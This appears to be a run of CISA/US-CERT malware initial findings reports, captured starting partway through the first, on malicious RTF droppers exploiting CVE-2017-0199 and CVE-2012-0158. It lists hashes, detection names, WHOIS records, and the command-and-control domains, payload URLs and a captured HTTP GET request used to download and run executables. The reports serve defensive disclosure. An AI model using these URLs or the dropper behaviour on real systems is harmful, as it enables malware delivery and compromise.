This report contains information obtained from automated analysis and is not intended to be a complete description of the submitted sample. Results may be limited due to the complexity of the samples, or due to the ability of the samples to defend against automated analysis techniques. If additional information is required, please contact the Cybersecurity and Infrastructure Security Agency (CISA) using the information provided at the end of this report.

US-CERT received two malicious RTF documents. When opened, the documents attempt to download a malicious payload associated with the Dridex banking trojan.

For a downloadable copy of IOCs, see MIFR-10121050-1.v2.stix.

Files (2)

7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c (7f2a499891a72b9f3b0923be0f9db4...)

c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629 (c98f34e4e87f041c3f19749bbb995b...)

Domains (2)

btt5sxcx90.com

rottastics36w.net

Findings 7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c Tags

CVE-2017-0199downloaderdroppertrojan

Details Name 7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c.bin Size 37510 bytes Type Rich Text Format data, version 1, unknown character set MD5 775390eeeff4d54b9c3941ef1f220c9f SHA1 3770051d8cb7df081b5409f2be3b8d6c916a2755 SHA256 7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c SHA512 1c590c54a76c556bebc0c5b99d1c14051716c4e01b9731149543722ff297748a8efb3acc136a6ecc2a7525c0af999e2ea1cfe9788f57d56071e843b60f464d63 ssdeep 384:C8W68Kw0zybdKk907U7UD1cYOs8BxJJ2PAi6rGsNAYAXJqskps:C8O07U7UDuYOs8BxX2PEhAZq1s Entropy 4.782672 Antivirus Ahnlab RTF/Cve-2017-0199 Antiy Trojan[Exploit]/RTF.CVE-2017-0199 Avira EXP/W2000.Agent.12344 BitDefender Trojan.Exploit.ANWK ClamAV Doc.Dropper.Agent-6249686-0 Cyren CVE-2017-0199.B!Camelot ESET Win32/Exploit.CVE-2017-0199.A trojan Emsisoft Trojan.Exploit.ANWK (B) Ikarus Exploit.CVE-2017-0199 McAfee Exploit-CVE2017-0199.c Microsoft Security Essentials Exploit:O97M/CVE-2017-0199!dha NANOAV Exploit.Ole2.CVE-2017-0199.equmby NetGate Exploit.Win32.Generic Quick Heal Exp.RTF.CVE-2017-0199 Sophos Troj/DocDrop-TJ Symantec Trojan.Mdropper TACHYON Downloader/RTF.CVE-2017-0199 TrendMicro TROJ_CV.2BCCE136 TrendMicro House Call TROJ_CV.2BCCE136 VirusBlokAda Exploit.O97M.Blinky.B YARA Rules

No matches found.

ssdeep Matches 96 ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e 96 c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629 Relationships 7f2a499891... Connected_To rottastics36w.net Description

7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c.bin is a malicious Rich Text Format (RTF) document. When the file is opened it will display an error message to the victim (Screenshot 1) while attempting to download the file, 'template.doc' from the domain, rottastics36w.net. The domain did not resolve to an IP address at the time of analysis.

Screenshots

Screenshot 1. Error Message -

rottastics36w.net Tags

command-and-control

URLs
  • http://rottastics36w.net/template.doc
Whois

Domain name: rottastics36w.net
Registry Domain ID: 77428276_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.eranet.com
Registrar URL: http://www.tnet.hk/
Update Date: 2017-04-02T16:00:00Z
Creation Date: 2017-04-03T09:14:21Z
Registrar Registration Expiration Date: 2018-04-02T16:00:00Z
Registrar: ERANET INTERNATIONAL LIMITED
Registrar IANA ID: 1868
Registrar Abuse Contact Email: support@eranet.com
Registrar Abuse Contact Phone: +852.35685366
Reseller:    
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientHold http://www.icann.org/epp#clientHold
Registry Registrant ID:
Registrant Name: Robert Ruthven
Registrant Organization: Gamblin Artists Colors
Registrant Street: 323 SE Division Pl
Registrant City: Portland
Registrant Province/state: OR
Registrant Postal Code: 97202
Registrant Country: US
Registrant Phone: +1.5034359411
Registrant Phone EXT:
Registrant Fax: +1.5034359411
Registrant Fax EXT:
Registrant Email: jenniemarc@mail.com
Registry Admin ID:
Admin Name: Robert Ruthven
Admin Organization: Gamblin Artists Colors
Admin Street: 323 SE Division Pl
Admin City: Portland
Admin Province/state: OR
Admin Postal Code: 97202
Admin Country: US
Admin Phone: +1.5034359411
Admin Phone EXT:
Admin Fax: +1.5034359411
Admin Fax EXT:
Admin Email: jenniemarc@mail.com
Registry Tech ID:
Tech Name: Robert Ruthven
Tech Organization: Gamblin Artists Colors
Tech Street: 323 SE Division Pl
Tech City: Portland
Tech Province/state: OR
Tech Postal Code: 97202
Tech Country: US
Tech Phone: +1.5034359411
Tech Phone EXT:
Tech Fax: +1.5034359411
Tech Fax EXT:
Tech Email: jenniemarc@mail.com

Relationships rottastics36w.net Connected_From 7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c Description

When the document, 7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c.bin is opened an attempt is made to download the file 'template.doc' from this domain. The domain does not resolve to an IP address.

c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629 Tags

CVE-2017-0199downloaderdroppertrojan

Details Name c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629.bin Size 37517 bytes Type Rich Text Format data, version 1, unknown character set MD5 cd60a118fede29f93363a807ce19c208 SHA1 09048811d050bd5f29be36a4b145709f26d4185a SHA256 c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629 SHA512 158dc4490e3d4bc0777d8af4e68882d7346deeb2768f02f6003478ee5941ba5ce9c6e342f3d4b91a760c7ff8b77959117f828a6b6ca77d298802eb6381358697 ssdeep 384:C8W68Kw0zybdKk907U7UYcYOs8BaJJ2PAi6rGsNAYAXJqskps:C8O07U7UxYOs8BaX2PEhAZq1s Entropy 4.782730 Antivirus Ahnlab RTF/Exploit Antiy Trojan[Exploit]/RTF.CVE-2017-0199 Avira EXP/W2000.Agent.12345 BitDefender Trojan.Agent.CFWP ClamAV Rtf.Exploit.CVE_2017_0199-6336824-0 Cyren CVE-2017-0199.B!Camelot ESET Win32/Exploit.CVE-2017-0199.A trojan Emsisoft Trojan.Agent.CFWP (B) Ikarus Exploit.CVE-2017-0199 McAfee Exploit-CVE2017-0199.c Microsoft Security Essentials Exploit:O97M/Blinky.B NANOAV Exploit.Ole2.CVE-2017-0199.equmby NetGate Exploit.Win32.Generic Quick Heal Exp.RTF.CVE-2017-0199 Sophos Troj/DocDrop-TJ Symantec Trojan.Mdropper TACHYON Downloader/RTF.CVE-2017-0199 TrendMicro TROJ_CV.5BA615B9 TrendMicro House Call TROJ_CV.5BA615B9 VirusBlokAda Exploit.O97M.Blinky.B YARA Rules

No matches found.

ssdeep Matches 96 7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c 97 ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e Relationships c98f34e4e8... Connected_To btt5sxcx90.com Description

c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629.bin is a malicious Rich Text Format (RTF) document. When the file is opened it will display an error message to the victim (Screenshot 1) while attempting to download the file, 'template.doc' from the domain, btt5sxcx90.com. The domain did not resolve to an IP address at the time of analysis.

Screenshots

Screenshot 1. Error Message -

btt5sxcx90.com Tags

command-and-control

URLs
  • http://btt5sxcx90.com/template.doc
Whois

Domain name: btt5sxcx90.com
Registry Domain ID: 77428276_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.eranet.com
Registrar URL: http://www.tnet.hk/
Update Date: 2017-04-02T16:00:00Z
Creation Date: 2017-04-03T09:15:33Z
Registrar Registration Expiration Date: 2018-04-02T16:00:00Z
Registrar: ERANET INTERNATIONAL LIMITED
Registrar IANA ID: 1868
Registrar Abuse Contact Email: support@eranet.com
Registrar Abuse Contact Phone: +852.35685366
Reseller:    
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientHold http://www.icann.org/epp#clientHold
Registry Registrant ID:
Registrant Name: Robert Ruthven
Registrant Organization: Gamblin Artists Colors
Registrant Street: 323 SE Division Pl
Registrant City: Portland
Registrant Province/state: OR
Registrant Postal Code: 97202
Registrant Country: US
Registrant Phone: +1.5034359411
Registrant Phone EXT:
Registrant Fax: +1.5034359411
Registrant Fax EXT:
Registrant Email: jenniemarc@mail.com
Registry Admin ID:
Admin Name: Robert Ruthven
Admin Organization: Gamblin Artists Colors
Admin Street: 323 SE Division Pl
Admin City: Portland
Admin Province/state: OR
Admin Postal Code: 97202
Admin Country: US
Admin Phone: +1.5034359411
Admin Phone EXT:
Admin Fax: +1.5034359411
Admin Fax EXT:
Admin Email: jenniemarc@mail.com
Registry Tech ID:
Tech Name: Robert Ruthven
Tech Organization: Gamblin Artists Colors
Tech Street: 323 SE Division Pl
Tech City: Portland
Tech Province/state: OR
Tech Postal Code: 97202
Tech Country: US
Tech Phone: +1.5034359411
Tech Phone EXT:
Tech Fax: +1.5034359411
Tech Fax EXT:
Tech Email: jenniemarc@mail.com

Relationships btt5sxcx90.com Connected_From c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629 Description

When the document, c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629.bin is opened an attempt is made to download the file 'template.doc' from this domain. The domain does not resolve to an IP address.

Relationship Summary 7f2a499891... Connected_To rottastics36w.net rottastics36w.net Connected_From 7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c c98f34e4e8... Connected_To btt5sxcx90.com btt5sxcx90.com Connected_From c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629 Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.us-cert.gov.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

MIFR-10079683-1.v2

US-CERT All NCAS Products - Tue, 05/12/2020 - 16:21
Original release date: May 12, 2020
  Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary Description

This report contains information obtained from automated analysis and is not intended to be a complete description of the submitted sample. Results may be limited due to the complexity of the samples, or due to the ability of the samples to defend against automated analysis techniques. If additional information is required, please contact the Cybersecurity and Infrastructure Security Agency (CISA) using the information provided at the end of this report.

CISA received one artifact, ff4138ca9119ab0381ad6575f041e633, which appeared to be a crafted RTF document to perform penetration testing for the CVE-2012-0158 vulnerability found in Microsoft Office 2003, 2007 and 2010. It is actually an obfuscated RTF that when opened in Microsoft Word, it connected to nanocoatingindonesia.co.id and attempted to download an executable named Specification.exe, copied it over to word.scr and executed it immediately. At the time of this analysis, the domain returned HTTP 404 not found to the HTTP GET request.

For a downloadable copy of IOCs, see MIFR-10079683-1.v2.stix.

Files (1)

ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc (ff4138ca9119ab0381ad6575f041e6...)

Domains (1)

nanocoatingindonesia.co.id

IPs (1)

114.199.90.60

Findings ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc Tags

CVE-2012-0158droppertrojan

Details Name ff4138ca9119ab0381ad6575f041e633 Size 1203123 bytes Type Rich Text Format data, version 1, unknown character set MD5 ff4138ca9119ab0381ad6575f041e633 SHA1 a3639691eb5fa1b41225ff35791f9931b62aeacd SHA256 ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc SHA512 42b47b48420367b4d4ce6e94d0d6e776d4ac903873324abd09c4e7776cf0cb5c79796421a6072f5d5624f09eb4080ed69799e6ebb23e68d3cc18f76240c3d1e9 ssdeep 96:GiIH6Q+Y2pbrh8mM/iBq7KWJZ6rBcClgJr3u17ejofQqa5hstzaqiFi12B7FiJi6:GlH6rfh8mQ7KraIwmzOiJN64g6mS12y Entropy 2.667311 Antivirus Ahnlab RTF/Exploit Antiy Trojan[Exploit]/Office.CVE-2012-0158.h Avira EXP/CVE-2012-0158.TJ BitDefender Exploit.RTF.CVE-2012-0158.H ClamAV Rtf.Dropper.Agent-1557037 Emsisoft Exploit.RTF.CVE-2012-0158.H (B) Ikarus Trojan.Win32.Exploit McAfee Exploit-CVE2012-0158.w Microsoft Security Essentials Exploit:Win32/CVE-2012-0158 NANOAV Exploit.Rtf.Heuristic-rtf.dinbqn Quick Heal Exp.RTF.Obfus.Gen Sophos Troj/DocDrop-ID Symantec Trojan.Mdropper TACHYON Exploit.RTF.CVE-2012-0158.H TrendMicro TROJ_MD.E9643850 TrendMicro House Call TROJ_MD.E9643850 YARA Rules

No matches found.

ssdeep Matches 99 41bc1f68ca81527487e22bb2bc3db796f5a8724258fc8769a288a6ff0f6875e5 Relationships ebbca8bb8e... Connected_To nanocoatingindonesia.co.id Description

FF4138CA9119AB0381AD6575F041E633 is an obfuscated RTF document, appeared to be crafted to perform penetration testing when examined under a hexadecimal editor. Close to the end of file, ASCII data "For pentesting purposes only!" and the MD5 hash value of the RTF were found.

However, when the RTF was opened in Microsoft Word, it sent a HTTP GET request to the domain nanocoatingindonesia.co.id in order to download a binary named Specification.exe. If successfully downloaded it would copy Specification.exe to word.scr and immediately execute it.

When the RTF was examined under a debugger, the location of word.scr was in the C:\Windows\system32 directory; word.scr ran on the system followed by a system crash and reboot. However, when the RTF was opened without a debugger, word.scr was copied to the same directory where RTF was located at and the system did not crash.

At the time of this analysis, nanocoatingindonesia.co.id returned HTTP 404 Not Found to the HTTP GET request for the Specification.exe binary.

Screenshots

Figure 1 -

Figure 2 -

Figure 3 -

Figure 4 -

nanocoatingindonesia.co.id Tags

command-and-control

HTTP Sessions
  • GET /1/Specification.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: nanocoatingindonesia.co.id
    Connection: Keep-Alive

    HTTP/1.1 404 Not Found
    Date: Fri, 19 Aug 2016 xx:xx:xx GMT
    Server: Apache
    Content-Length: 336
    Connection: close
    Content-Type: text/html; charset=iso-8859-1

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /1/Specification.exe was not found on this server.</p>
    <p>Additionally, a 404 Not Found
    error was encountered while trying to use an ErrorDocument to handle the request.</p>
    </body></html
Whois

Domain ID:PANDI-DO696479
Domain Name:NANOCOATINGINDONESIA.CO.ID
Created On:10-Mar-2016 04:31:11 UTC
Last Updated On:15-Mar-2016 04:42:05 UTC
Expiration Date:10-Mar-2017 23:59:59 UTC
Status:ok
Registrant ID:04nanoc1
Registrant Name:Nano Coating indonesia
Registrant Organization:PT Nano Coating Indonesia
Registrant Street1:Jl.Industri Selatan 7 Blok FF 1 C\nKawasan industri Jababeka 2
Registrant Street2:Jababeka Cikarang
Registrant City:bekasi
Registrant State/Province:Jawa Barat
Registrant Postal Code:17530
Registrant Country:ID
Registrant Phone:+62.2189842888x1234
Registrant FAX:+62.2189842777
Registrant Email:XX@primatigonglobal.co.id
Admin ID:04nanoc1
Admin Name:Nano Coating indonesia
Admin Organization:PT Nano Coating Indonesia
Admin Street1:Jl.Industri Selatan 7 Blok FF 1 C\nKawasan industri Jababeka 2
Admin Street2:Jababeka Cikarang
Admin City:bekasi
Admin State/Province:Jawa Barat
Admin Postal Code:17530
Admin Country:ID
Admin Phone:+62.2189842888x1234
Admin FAX:+62.2189842777
Admin Email:XX@primatigonglobal.co.id
Tech ID:04hendr62
Tech Name:Hendro
Tech Organization:PT Nano Coating Indonesia
Tech Street1:Jl.Industri Selatan 7 Blok FF 1 C.\nKawasan Industri Jababeka II Cikarang Kab.Bekasi
Tech City:Bekasi
Tech State/Province:Jawa Barat
Tech Postal Code:17530
Tech Country:ID
Tech Phone:+62.2189842888x1234
Tech FAX:+62.2189842777
Tech Email:XX@primatigonglobal.co.id
Billing ID:04nanoc1
Billing Name:Nano Coating indonesia
Billing Organization:PT Nano Coating Indonesia
Billing Street1:Jl.Industri Selatan 7 Blok FF 1 C\nKawasan industri Jababeka 2
Billing Street2:Jababeka Cikarang
Billing City:bekasi
Billing State/Province:Jawa Barat
Billing Postal Code:17530
Billing Country:ID
Billing Phone:+62.2189842888x1234
Billing FAX:+62.2189842777
Billing Email:XX@primatigonglobal.co.id
Sponsoring Registrar ID:indoreg
Sponsoring Registrar Organization:INDOREG
Sponsoring Registrar City:Jakarta
Sponsoring Registrar Postal Code:11520
Sponsoring Registrar Country:ID
Sponsoring Registrar Phone:0215821567
Name Server:NS5.INDOREG.CO.ID
Name Server:NS6.INDOREG.CO.ID
DNSSEC:Unsigned

Relationships nanocoatingindonesia.co.id Resolved_To 114.199.90.60 nanocoatingindonesia.co.id Connected_From ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc 114.199.90.60 Relationships 114.199.90.60 Resolved_To nanocoatingindonesia.co.id Relationship Summary ebbca8bb8e... Connected_To nanocoatingindonesia.co.id nanocoatingindonesia.co.id Resolved_To 114.199.90.60 nanocoatingindonesia.co.id Connected_From ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc 114.199.90.60 Resolved_To nanocoatingindonesia.co.id Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.us-cert.gov.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

MIFR-10079682-1.v2

US-CERT All NCAS Products - Tue, 05/12/2020 - 16:14
Original release date: May 12, 2020
  Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary Description

This report contains information obtained from automated analysis and is not intended to be a complete description of the submitted sample. Results may be limited due to the complexity of the samples, or due to the ability of the samples to defend against automated analysis techniques. If additional information is required, please contact the Cybersecurity and Infrastructure Security Agency (CISA) using the information provided at the end of this report.

One malicious Rich Text Format file was submitted for analysis. This file is designed to download and execute a payload from a C2 server.

For a downloadable copy of IOCs, see MIFR-10079682-1.v2.stix.

Files (1)

41bc1f68ca81527487e22bb2bc3db796f5a8724258fc8769a288a6ff0f6875e5 (16f92777f3dca38f0293cfc66edaa6...)

Domains (1)

nanocoatingindonesia.co.id

Findings 41bc1f68ca81527487e22bb2bc3db796f5a8724258fc8769a288a6ff0f6875e5 Tags

CVE-2012-0158droppertrojan

Details Name 16f92777f3dca38f0293cfc66edaa6cb Size 1202347 bytes Type Rich Text Format data, version 1, unknown character set MD5 16f92777f3dca38f0293cfc66edaa6cb SHA1 8ced8019a845bd1d555172a96b1ebfa594bb9e46 SHA256 41bc1f68ca81527487e22bb2bc3db796f5a8724258fc8769a288a6ff0f6875e5 SHA512 d1b5d0c4d430068e9028b6621a463b772fd2543df803fdc6e54ca5929b56f2791c5058193c6d588372987fa80ed871531fb752326147281ec6645314c37f284a ssdeep 96:GiIH6Q+Y2pbrh8mM/iBq7KWJZ6rBcClgJr3u17ejofQqa5hstzaqiFi12B7FiJiJ:GlH6rfh8mQ7KraIwmzOiJN64g6mS12x Entropy 2.667135 Antivirus Ahnlab RTF/Exploit Antiy Trojan[Exploit]/Office.CVE-2012-0158.h Avira EXP/CVE-2012-0158.VZ BitDefender Exploit.RTF-ObfsStrm.Gen Emsisoft Exploit.RTF-ObfsStrm.Gen (B) Ikarus Trojan.Win32.Exploit McAfee Exploit-CVE2012-0158.w Microsoft Security Essentials Exploit:Win32/CVE-2012-0158 NANOAV Exploit.Rtf.Heuristic-rtf.dinbqn Quick Heal Exp.RTF.Obfus.Gen Sophos Troj/DocDrop-ID Symantec Trojan.Mdropper TACHYON Exploit.RTF-ObfsStrm.Gen TrendMicro TROJ_MD.E9643850 TrendMicro House Call TROJ_MD.E9643850 YARA Rules

No matches found.

ssdeep Matches 99 ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc Relationships 41bc1f68ca... Connected_From nanocoatingindonesia.co.id Description

This file is a malicious RTF file. This file is designed to download and execute a payload from a C2 server.

The following is the URI that the file used to download:

--begin URI--
nanocoatingindonesia.co.id/1/Order.exe
--end URI--

Analysis indicates that this file will download and install a payload on the compromised system.

The payload that the malware attempted to download was not available for further analysis.

nanocoatingindonesia.co.id Tags

command-and-control

URLs
  • nanocoatingindonesia.co.id/1/Order.exe
Whois

Domain ID:PANDI-DO696479
Domain Name:NANOCOATINGINDONESIA.CO.ID
Created On:10-Mar-2016 04:31:11 UTC
Last Updated On:15-Mar-2016 04:42:05 UTC
Expiration Date:10-Mar-2017 23:59:59 UTC
Status:ok
Registrant ID:04nanoc1
Registrant Name:Nano Coating indonesia
Registrant Organization:PT Nano Coating Indonesia
Registrant Street1:Jl.Industri Selatan 7 Blok FF 1 C\nKawasan industri Jababeka 2
Registrant Street2:Jababeka Cikarang
Registrant City:bekasi
Registrant State/Province:Jawa Barat
Registrant Postal Code:17530
Registrant Country:ID
Registrant Phone:+62.2189842888x1234
Registrant FAX:+62.2189842777
Registrant Email:it@primatigonglobal.co.id
Admin ID:04nanoc1
Admin Name:Nano Coating indonesia
Admin Organization:PT Nano Coating Indonesia
Admin Street1:Jl.Industri Selatan 7 Blok FF 1 C\nKawasan industri Jababeka 2
Admin Street2:Jababeka Cikarang
Admin City:bekasi
Admin State/Province:Jawa Barat
Admin Postal Code:17530
Admin Country:ID
Admin Phone:+62.2189842888x1234
Admin FAX:+62.2189842777
Admin Email:it@primatigonglobal.co.id
Tech ID:04hendr62
Tech Name:Hendro
Tech Organization:PT Nano Coating Indonesia
Tech Street1:Jl.Industri Selatan 7 Blok FF 1 C.\nKawasan Industri Jababeka II Cikarang Kab.Bekasi
Tech City:Bekasi
Tech State/Province:Jawa Barat
Tech Postal Code:17530
Tech Country:ID
Tech Phone:+62.2189842888x1234
Tech FAX:+62.2189842777
Tech Email:it@primatigonglobal.co.id
Billing ID:04nanoc1
Billing Name:Nano Coating indonesia
Billing Organization:PT Nano Coating Indonesia
Billing Street1:Jl.Industri Selatan 7 Blok FF 1 C\nKawasan industri Jababeka 2
Billing Street2:Jababeka Cikarang
Billing City:bekasi
Billing State/Province:Jawa Barat
Billing Postal Code:17530
Billing Country:ID
Billing Phone:+62.2189842888x1234
Billing FAX:+62.2189842777
Billing Email:it@primatigonglobal.co.id
Sponsoring Registrar ID:indoreg
Sponsoring Registrar Organization:INDOREG
Sponsoring Registrar City:Jakarta
Sponsoring Registrar Postal Code:11520
Sponsoring Registrar Country:ID
Sponsoring Registrar Phone:0215821567
Name Server:NS5.INDOREG.CO.ID
Name Server:NS6.INDOREG.CO.ID
DNSSEC:Unsigned

Relationships nanocoatingindonesia.co.id Connected_To 41bc1f68ca81527487e22bb2bc3db796f5a8724258fc8769a288a6ff0f6875e5 Relationship Summary 41bc1f68ca... Connected_From nanocoatingindonesia.co.id nanocoatingindonesia.co.id Connected_To 41bc1f68ca81527487e22bb2bc3db796f5a8724258fc8769a288a6ff0f6875e5 Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

